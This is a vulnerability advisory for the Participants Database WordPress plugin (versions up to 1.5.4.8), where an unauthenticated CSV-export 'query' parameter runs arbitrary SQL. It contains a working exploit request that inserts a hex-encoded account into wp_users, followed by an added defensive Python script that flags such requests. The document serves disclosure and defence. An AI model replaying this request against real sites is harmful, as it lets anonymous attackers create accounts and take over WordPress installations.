Yarubo #1: Arbitrary SQL Execution in Participants Database for Wordpress
=========================================================================
Program: Participants Database <= 1.5.4.8
Severity: Unauthenticated attacker can fully compromise the Wordpress
installation
Permalink: http://www.yarubo.com/advisories/1
— Info —
Participants Database is a popular Wordpress plugin that offers the
functionality needed to build and maintain a database of people. As of
today the plugin has been downloaded 92,089 times.
— Vulnerability details —
1. Due to insufficient privilege checks it is possible for anonymous
(unauthenticated) users to trigger some administrative actions if any of
the shortcodes is used (e.g. on the signup page).
2. The action "export CSV" takes a parameter called "query" that can
contain an arbitrary SQL query. This means that an unauthenticated user can
execute arbitrary SQL statements (e.g. create an admin user, read or write
files, or execute code depending on the MySQL user privileges).
— Exploit —
Add a user to WordPress as follows (if you want an admin user, also add
admin privileges to wp_usermeta):
POST /wordpress/pdb-signup/ HTTP/1.1
Host: www.example.com
Content-Length: 789
(…)
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundaryuoACADe1C2IFWMxN
------WebKitFormBoundaryuoACADe1C2IFWMxN
Content-Disposition: form-data; name="action"
output CSV
------WebKitFormBoundaryuoACADe1C2IFWMxN
Content-Disposition: form-data; name="CSV_type"
participant list
------WebKitFormBoundaryuoACADe1C2IFWMxN
Content-Disposition: form-data; name="subsource"
participants-database
------WebKitFormBoundaryuoACADe1C2IFWMxN
Content-Disposition: form-data; name="query"
INSERT INTO wp_users
(ID,user_login,user_pass,user_nicename,user_email,user_registered,user_status,display_name)
VALUES
(31337,0x74657374,0x245024425a7a59615354486f41364b693355363576772f5461473861412f475a4b31,0x59617275626f,0x7465737440746573742e636f6d,0x323031342d31312d31312030303a30303a3030,0,0x59617275626f);
------WebKitFormBoundaryuoACADe1C2IFWMxN
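As an added example (not part of the Yarubo advisory and not the plugin's own code), the Python script below triages a captured multipart POST of the shape shown above and flags the two conditions the advisory describes: the CSV export action reached without a WordPress login cookie, and a "query" form field carrying SQL text that a browser should never be supplying. The sample requests, the boundary string, the paths and the cookie value are constructed for this example; the wordpress_logged_in_ prefix is WordPress's real login cookie name, but its presence is used only as a heuristic that the request came from a logged-in browser, not as proof of a valid session.

```python
import re
from typing import Dict, List, Optional, Tuple

# Boundary parameter of a multipart/form-data Content-Type (quoted or bare).
BOUNDARY_RE = re.compile(r'boundary=("?)([^";\s]+)\1')
# SQL verbs/functions that should never arrive from a browser form field.
WRITE_SQL_RE = re.compile(
    r"\b(INSERT|UPDATE|DELETE|DROP|ALTER|CREATE|REPLACE|LOAD_FILE|OUTFILE|DUMPFILE)\b", re.I
)
# Prefix of WordPress's real login cookie; presence is a heuristic, not session validation.
WP_LOGIN_COOKIE_PREFIX = "wordpress_logged_in_"


def build_request(path: str, fields: Dict[str, str], cookie: Optional[str] = None) -> bytes:
    """Construct a raw multipart/form-data POST (sample input; boundary is made up)."""
    boundary = "----ConstructedBoundary1234"
    head = f"POST {path} HTTP/1.1\r\nHost: www.example.com\r\n"
    if cookie:
        head += f"Cookie: {cookie}\r\n"
    # Folded Content-Type header, the way the advisory's capture shows it.
    head += f"Content-Type: multipart/form-data;\r\n boundary={boundary}\r\n\r\n"
    body = "".join(
        f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n'
        for name, value in fields.items()
    )
    return (head + body + f"--{boundary}--\r\n").encode()


def parse_headers(head: str) -> Tuple[str, Dict[str, str]]:
    """Return (request line, lower-cased header dict); joins folded continuation lines."""
    lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    last: Optional[str] = None
    for line in lines[1:]:
        if line[:1] in (" ", "\t") and last is not None:
            headers[last] += " " + line.strip()
            continue
        name, _, value = line.partition(":")
        last = name.strip().lower()
        headers[last] = value.strip()
    return lines[0], headers


def parse_form_data(body: bytes, boundary: str) -> Dict[str, str]:
    """Minimal multipart/form-data field extractor (text fields only)."""
    fields: Dict[str, str] = {}
    for part in body.split(b"--" + boundary.encode()):
        part = part.strip(b"\r\n")
        if not part or part == b"--":          # preamble / closing delimiter
            continue
        part_head, _, value = part.partition(b"\r\n\r\n")
        match = re.search(rb'name="([^"]*)"', part_head)
        if match:
            fields[match.group(1).decode()] = value.decode(errors="replace")
    return fields


def triage_request(raw: bytes) -> Dict[str, object]:
    """Flag the advisory's abuse pattern in one captured request."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, headers = parse_headers(head.decode(errors="replace"))
    match = BOUNDARY_RE.search(headers.get("content-type", ""))
    fields = parse_form_data(body, match.group(2)) if match else {}
    authenticated = WP_LOGIN_COOKIE_PREFIX in headers.get("cookie", "")

    findings: List[str] = []
    if fields.get("action") == "output CSV":       # the export action from the advisory
        findings.append("csv-export-action")
        if not authenticated:
            findings.append("unauthenticated")
        if "query" in fields:                      # SQL text supplied by the client
            findings.append("client-supplied-query")
            if WRITE_SQL_RE.search(fields["query"]):
                findings.append("write-or-file-sql")

    if "client-supplied-query" in findings:
        severity = "critical" if "unauthenticated" in findings else "high"
    elif "unauthenticated" in findings:
        severity = "medium"
    elif findings:
        severity = "info"
    else:
        severity = "none"
    return {"request": request_line, "authenticated": authenticated,
            "fields": fields, "findings": findings, "severity": severity}


# Constructed samples: the first mirrors the shape of the advisory's request.
SAMPLES = {
    "anonymous-export": build_request("/wordpress/pdb-signup/", {
        "action": "output CSV", "CSV_type": "participant list",
        "subsource": "participants-database",
        "query": "INSERT INTO wp_users (user_login) VALUES ('constructed')"}),
    "admin-export": build_request("/wp-admin/admin.php", {
        "action": "output CSV", "CSV_type": "participant list"},
        cookie="wordpress_logged_in_0123abcd=constructed-session-cookie"),
    "plain-signup": build_request("/wordpress/pdb-signup/", {
        "action": "signup", "first_name": "Ada"}),
}

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        result = triage_request(raw)
        print(f"{label:17} {result['severity']:8} {result['findings']}")
```

A request is reported even when it carries a login cookie, because the defensible design is that the server never accepts SQL text from the client at all; the cookie only lowers the severity from critical to high. The header parser joins folded continuation lines so that the boundary can be recovered from captures where Content-Type was wrapped, as in the advisory's own listing.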
— Solution —
This issue has been fixed in version 1.5.4.9. Download the newest version
from:
https://wordpress.org/plugins/participants-database/
— Credit —
Yarubo Research Team
research [at] yarubo.com
Network Security Scan:
http://www.yarubo.com/
Free Heartbleed Scan:
http://www.yarubo.com/heartbleed
//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Neither Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information.